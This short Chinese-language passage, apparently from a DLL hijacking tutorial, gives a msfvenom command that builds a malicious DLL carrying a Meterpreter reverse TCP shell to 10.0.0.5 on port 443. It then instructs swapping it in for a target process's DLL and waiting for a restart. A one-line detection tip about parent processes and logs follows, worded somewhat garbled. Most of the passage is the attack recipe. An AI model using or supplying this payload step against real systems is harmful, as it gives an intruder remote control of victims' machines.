实际演示

首先,在kali下使用msfvenom生成恶意的dll文件(shellcode为反弹shell的shellcode)

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=443 -f dll > evil-meterpreter64.dll

然后替换dll,等待目标进程重启。


检测手段

查看父进程无和日志。